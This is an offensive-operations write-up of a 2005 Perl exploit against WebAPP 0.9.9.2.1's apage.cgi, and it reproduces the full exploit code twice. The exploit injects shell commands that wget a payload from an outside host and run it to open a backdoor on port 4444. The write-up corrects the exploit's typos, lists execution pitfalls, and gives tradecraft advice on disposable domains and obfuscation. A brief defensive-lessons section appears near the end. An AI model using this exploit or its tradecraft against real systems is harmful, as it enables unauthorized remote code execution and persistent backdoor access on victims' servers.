WebAPP 0.9.9.2.1 Remote Command Execution: A Deep Dive for Offensive Operations

What this paper is

This paper details a remote command execution vulnerability in WebAPP version 0.9.9.2.1. The exploit targets a flaw in the apage.cgi script, allowing an attacker to execute arbitrary commands on the vulnerable server. The exploit, written in Perl, aims to establish a backdoor on port 4444.

Simple technical breakdown

The vulnerability lies in how the apage.cgi script handles user input. It appears to be susceptible to command injection. The exploit crafts a malicious HTTP GET request. This request includes a specially formatted URL parameter that, when processed by the apage.cgi script, allows arbitrary commands to be appended and executed on the server.

The exploit performs two main actions:

Download a payload: It first attempts to download a file named alpha.txt from a remote server (www.khatotarh.com) to the /tmp directory on the target.
Execute a backdoor: It then attempts to copy the downloaded file (alpha.txt) to alpha.pl, make it executable, and then execute it using Perl. The paper implies this alpha.pl script is designed to open a backdoor on port 4444.

Complete code and payload walkthrough

Let's break down the Perl script provided in the exploit.

#!/usr/bin/perl
#################################################################
#                         T r a p - S e t   U n d e r G r o u n D   H a c k i n g   T e a m                               #
#################################################################
# Remote C0mmand Executing Expl0it - For WebAPP CGI
#
#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v );
#E-Mail : Alpha_Programmer@Yahoo.com
#            Trapset_Sec@Yahoo.Ca
#This xpl Open a Backdoor in 4444 Port with Nobody Access !!! All Of The *NIX OS that Have UnPatch
#apage.cgi is Vulnerable in this M0ment !!
#
#################################################################
#  Gr33tz To ==>  AlphaST.Com , Crouz.Com  , Simorgh-ev.Com  And  MH_P0rtal , Oil_Krachack     #
#################################################################
use IO::Socket;

if (@ARGV < 2)
{
 print "\n==============================================\n";
 print " \n    WebAPP CGI Exploit By Alpha_Programmer \n\n";
 print "      Trap-Set Underground Hacking Team      \n\n";
 print "            Usage: <T4rg3t> <Dir>      \n\n";
 print "==============================================\n\n";
 print "Examples:\n\n";
 print "    WebApp.pl www.Host.com /cgi-bin/ \n";
 exit();
}


$serv = $ARGV[0];
$serv =~ s/http:\/\///ge;

$dir = $ARGV[1];

$cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";

$cmde =~ s/ /"\$IFS"/ge;

$req  = "GET http://$serv";
$req .= "$dir";
$req .= "apage.cgi?f=file.htm.|echo\$IFS\"_N_\";$cmde;echo\$IFS\"_T_\"| HTTP/1.0\n\n";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";

print $sock $req;
print "\nPlease Wait ...\n\n";
sleep(3000);
close($sock);

$sock2 = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";


$cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 sirus.pl;perl sirus.pl";

$cmde2 =~ s/ /"\$IFS"/ge;

$req2  = "GET http://$serv";
$req2 .= "$dir";
$req2 .= "apage.cgi?f=file.htm.|echo\$IFS\"_N_\";$cmde2;echo\$IFS\"_T_\"| HTTP/1.0\n\n";

print $sock2 $req2;
print "\n\n$$$   OK -- Now Try: Nc -v www.host.com 4444   $$$\n";
print "$$  if This Port was Close , This mean is That , You Hav'nt Permission to Write in /TMP  $$\n";

### EOF ###

Code Fragment/Block	Practical Purpose
`#!/usr/bin/perl`	Shebang line, indicating the script should be executed with the Perl interpreter.
`use IO::Socket;`	Imports the `IO::Socket` module, which is essential for network communication (creating sockets).
`if (@ARGV < 2) { ... exit(); }`	Checks if the script received at least two command-line arguments. If not, it prints usage instructions and exits. This ensures the target host and directory are provided.
`$serv = $ARGV[0];`	Assigns the first command-line argument (the target host) to the `$serv` variable.
`$serv =~ s/http:\/\///ge;`	Removes any "http://" prefix from the target host string, ensuring a clean hostname for socket connection.
`$dir = $ARGV[1];`	Assigns the second command-line argument (the target directory, e.g., `/cgi-bin/`) to the `$dir` variable.
`$cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";`	Defines the first command string. This command changes the directory to `/tmp` and then uses `wget` to download a file named `alpha.txt` from a specific URL. This is the initial payload download stage.
`$cmde =~ s/ /"\$IFS"/ge;`	This is a crucial step for command injection. It replaces all spaces in the command string with `"$IFS"`. In a shell environment, `$IFS` (Internal Field Separator) is a special variable that, when used with double quotes, can help bypass certain command parsing or injection filters by treating spaces as delimiters. This is a common technique in shell command injection.
`$req = "GET http://$serv";`	Starts constructing the first HTTP GET request.
`$req .= "$dir";`	Appends the target directory to the request path.
`$req .= "apage.cgi?f=file.htm.	echo$IFS"N";$cmde;echo$IFS"T"

*   `apage.cgi`: The vulnerable CGI script.
*   `?f=file.htm.`: A parameter passed to `apage.cgi`. The exploit likely relies on `apage.cgi` not properly sanitizing this parameter.
*   `|`: The pipe symbol. This is used to chain commands in a Unix-like shell.
*   `echo\$IFS\"_N_\";`: Prints a marker `_N_` to help delineate output. The `\$IFS` is used here as part of the command injection technique.
*   `$cmde`: Inserts the previously constructed download command.
*   `echo\$IFS\"_T_\"|`: Prints a marker `_T_` and pipes it.
*   `HTTP/1.0\n\n`: Standard HTTP request headers.

$sock = IO::Socket::INET->new(...) or die ...; | Creates a new TCP socket connection to the target server on port 80 (HTTP). If the connection fails, it prints an error message and exits.
print $sock $req; | Sends the crafted HTTP GET request to the server.
print "\nPlease Wait ...\n\n"; | Informs the user that the script is waiting.
sleep(3000); | Pauses the script for 3000 seconds (50 minutes). This is an extremely long sleep. It's likely intended to give the server time to process the request and download the file, or perhaps it's a placeholder and the actual time needed is much shorter. In a real engagement, this would be adjusted.
close($sock); | Closes the first socket connection.
$sock2 = IO::Socket::INET->new(...) or die ...; | Opens a second TCP socket connection to the target server on port 80. This is necessary because the first connection was closed.
$cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 sirus.pl;perl sirus.pl"; | Defines the second command string.
* cd /tmp: Changes directory to /tmp.
* cp alpha.txt alpha.pl: Copies the downloaded alpha.txt to alpha.pl.
* chmod 777 sirus.pl: Note: The command here is chmod 777 sirus.pl, but the file being copied is alpha.txt and then renamed to alpha.pl. This looks like a typo in the original exploit. It should likely be chmod 777 alpha.pl; perl alpha.pl. Assuming the intent is to execute the downloaded script.
* perl sirus.pl: Note: Similar to the chmod command, this references sirus.pl instead of alpha.pl. This is another likely typo in the original exploit. The intent is to execute the downloaded and renamed script.
$cmde2 =~ s/ /"\$IFS"/ge; | Again, replaces spaces with "$IFS" for command injection robustness.
$req2 = "GET http://$serv"; | Starts constructing the second HTTP GET request.
$req2 .= "$dir"; | Appends the target directory.
$req2 .= "apage.cgi?f=file.htm.|echo\$IFS\"_N_\";$cmde2;echo\$IFS\"_T_\"| HTTP/1.0\n\n"; | The second crafted HTTP GET request, similar to the first, but this time it injects the second command string ($cmde2) which aims to execute the downloaded payload.
print $sock2 $req2; | Sends the second crafted HTTP GET request.
print "\n\n$$$ OK -- Now Try: Nc -v www.host.com 4444 $$$\n"; | Informs the user to check for a Netcat listener on port 4444 of the target host. This is the expected backdoor.
print "$$ if This Port was Close , This mean is That , You Hav'nt Permission to Write in /TMP $$\n"; | Provides a hint: if the port is closed, it suggests a lack of write permissions in /tmp, which would prevent the download and execution of the payload.

Payload Stages:

Stage 1 (Download):
- Command: cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt
- Purpose: To download the secondary payload (alpha.txt) from a remote attacker-controlled server into the /tmp directory on the target.
Stage 2 (Execution):
- Command: cd /tmp;cp alpha.txt alpha.pl;chmod 777 alpha.pl;perl alpha.pl (Corrected based on likely intent)
- Purpose: To rename the downloaded file to alpha.pl, make it executable, and then execute it using the Perl interpreter. The execution of alpha.pl is expected to establish a reverse shell or backdoor on port 4444.

Practical details for offensive operations teams

Required Access Level: Unauthenticated access to the web server is sufficient. The vulnerability is in a publicly accessible CGI script.
Lab Preconditions:
- A target server running WebAPP version 0.9.9.2.1 or a similar vulnerable version.
- The apage.cgi script must be present and accessible via HTTP.
- The target server must have wget installed and the ability to connect to http://www.khatotarh.com (or the attacker-controlled server hosting the payload).
- The target server must have write permissions in the /tmp directory.
- The target server must have a Perl interpreter installed.
- The attacker needs a server to host the alpha.txt payload.
- The attacker may want to set up a Netcat listener on port 4444 on their own machine to receive the backdoor connection.
Tooling Assumptions:
- Perl interpreter on the attacker's machine.
- Netcat (nc) utility for testing the backdoor.
- A web server to host the payload (alpha.txt).
Execution Pitfalls:
- Typographical Errors in Exploit: The original exploit contains apparent typos (sirus.pl instead of alpha.pl). These must be corrected before execution.
- Network Connectivity: The target must be able to reach the attacker's payload hosting server. Firewalls or network segmentation can prevent this.
- /tmp Write Permissions: If the target cannot write to /tmp, the exploit will fail. The exploit explicitly mentions this as a failure point.
- wget Availability: If wget is not installed on the target, the payload download will fail.
- Payload Server Availability: If the attacker's payload server is down or inaccessible, the download will fail.
- apage.cgi Behavior: The exploit relies on the specific way apage.cgi processes the f parameter. If the version or configuration is different, the injection might not work.
- Firewall on Target: Even if the backdoor is established, a firewall on the target might block outbound connections on port 4444.
- sleep(3000): The 50-minute sleep is excessive and likely unnecessary. It should be reduced or removed.
- Payload Content: The actual content of alpha.txt is unknown from this paper. It is assumed to be a Perl script that opens a backdoor. The effectiveness and nature of the backdoor depend entirely on this file.
Tradecraft Considerations:
- Payload Hosting: Use a domain that doesn't immediately link back to the engagement. Consider using a temporary, disposable domain or an IP address.
- Obfuscation: The $IFS trick is a basic form of obfuscation. For more advanced operations, consider more sophisticated command injection techniques or encoding.
- Timing: The sleep command can be a giveaway. Adjust it based on observed network latency or remove it if not strictly needed.
- Telemetry: The primary telemetry will be the successful download of alpha.txt (visible on the attacker's payload server logs) and the establishment of a connection on port 4444. Network traffic to port 80 on the target will be evident.

Where this was used and when

This exploit was published on May 20, 2005. At that time, WebAPP was a known web application framework, and vulnerabilities in CGI scripts were common. This exploit targets a specific version (0.9.9.2.1). It's likely this vulnerability was present and exploitable in the wild during the mid-2000s. The author mentions "All Of The *NIX OS that Have UnPatch apage.cgi is Vulnerable in this M0ment!!", suggesting it was a widespread issue for systems using this version.

Defensive lessons for modern teams

Input Validation and Sanitization: This is the paramount lesson. CGI scripts and any web application code must rigorously validate and sanitize all user-supplied input. Never trust input from the client or external sources. Special attention should be paid to characters like |, ;, &, $, (, ), `, and shell metacharacters.
Principle of Least Privilege: Web server processes should run with the minimum necessary privileges. If the web server process doesn't need write access to /tmp, it shouldn't have it.
Patch Management: Keeping web server software and applications (like WebAPP) up-to-date with security patches is critical. Exploits targeting older, unpatched versions are common.
Web Application Firewalls (WAFs): A WAF can help detect and block malicious HTTP requests containing command injection patterns. However, WAFs are not foolproof and can be bypassed.
Network Segmentation and Egress Filtering: Restricting outbound connections from web servers can prevent them from downloading malicious payloads or establishing reverse shells.
Secure Coding Practices: Developers should be trained in secure coding practices to avoid vulnerabilities like command injection from the outset.
Logging and Monitoring: Robust logging of web server access and application errors can help detect attempted or successful exploitation. Monitoring for unusual outbound connections (like to suspicious IPs on non-standard ports) is also important.

ASCII visual (if applicable)

+-----------------+      +-----------------+      +-----------------+
| Attacker's      |      | Target Web      |      | Target Server   |
| Machine         |----->| Server (Port 80)|----->| (Vulnerable     |
| (Perl Script)   |      |                 |      | apage.cgi)      |
+-----------------+      +-----------------+      +-----------------+
        |                                                   |
        | 1. Send Malicious HTTP Request                    | 2. Execute Commands
        |    (Download Payload)                             |    (wget alpha.txt)
        |                                                   |
        | 3. Send Second Malicious HTTP Request             | 4. Execute Commands
        |    (Execute Payload)                              |    (perl alpha.pl)
        |                                                   |
        | 5. Listen on Port 4444                            | 6. Establish Backdoor
        |                                                   |    (Reverse Shell)
        +---------------------------------------------------+

This diagram illustrates the flow: the attacker's machine sends crafted HTTP requests to the target web server. The vulnerable apage.cgi script on the target server executes commands, first downloading a payload and then executing it, which in turn attempts to establish a backdoor connection back to the attacker on port 4444.

Source references

PAPER ID: 1005
PAPER TITLE: WebAPP 0.9.9.2.1 - Remote Command Execution (1)
AUTHOR: Alpha_Programmer
PUBLISHED: 2005-05-20
KEYWORDS: CGI,webapps
PAPER URL: https://www.exploit-db.com/papers/1005
RAW URL: https://www.exploit-db.com/raw/1005

Original Exploit-DB Content (Verbatim)

!/usr/bin/perl
#################################################################
#                         T r a p - S e t   U n d e r G r o u n D   H a c k i n g   T e a m                               #
#################################################################
# Remote C0mmand Executing Expl0it - For WebAPP CGI
#
#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v );
#E-Mail : Alpha_Programmer@Yahoo.com
#            Trapset_Sec@Yahoo.Ca
#This xpl Open a Backdoor in 4444 Port with Nobody Access !!! All Of The *NIX OS that Have UnPatch
#apage.cgi is Vulnerable in this M0ment !!
#
#################################################################
#  Gr33tz To ==>  AlphaST.Com , Crouz.Com  , Simorgh-ev.Com  And  MH_P0rtal , Oil_Krachack     #
#################################################################
use IO::Socket;

if (@ARGV < 2)
{
 print "\n==============================================\n";
 print " \n    WebAPP CGI Exploit By Alpha_Programmer \n\n";
 print "      Trap-Set Underground Hacking Team      \n\n";
 print "            Usage: <T4rg3t> <Dir>      \n\n";
 print "==============================================\n\n";
 print "Examples:\n\n";
 print "    WebApp.pl www.Host.com /cgi-bin/ \n";
 exit();
}


$serv = $ARGV[0];
$serv =~ s/http:\/\///ge;

$dir = $ARGV[1];

$cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";

$cmde =~ s/ /"\$IFS"/ge;

$req  = "GET http://$serv";
$req .= "$dir";
$req .= "apage.cgi?f=file.htm.|echo\$IFS\"_N_\";$cmde;echo\$IFS\"_T_\"| HTTP/1.0\n\n";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";

print $sock $req;
print "\nPlease Wait ...\n\n";
sleep(3000);
close($sock);

$sock2 = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";


$cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 sirus.pl;perl sirus.pl";

$cmde2 =~ s/ /"\$IFS"/ge;

$req2  = "GET http://$serv";
$req2 .= "$dir";
$req2 .= "apage.cgi?f=file.htm.|echo\$IFS\"_N_\";$cmde2;echo\$IFS\"_T_\"| HTTP/1.0\n\n";

print $sock2 $req2;
print "\n\n$$$   OK -- Now Try: Nc -v www.host.com 4444   $$$\n";
print "$$  if This Port was Close , This mean is That , You Hav'nt Permission to Write in /TMP  $$\n";

### EOF ###


# milw0rm.com [2005-05-20]

By exploitdb papers bot•May 20, 2005•

papers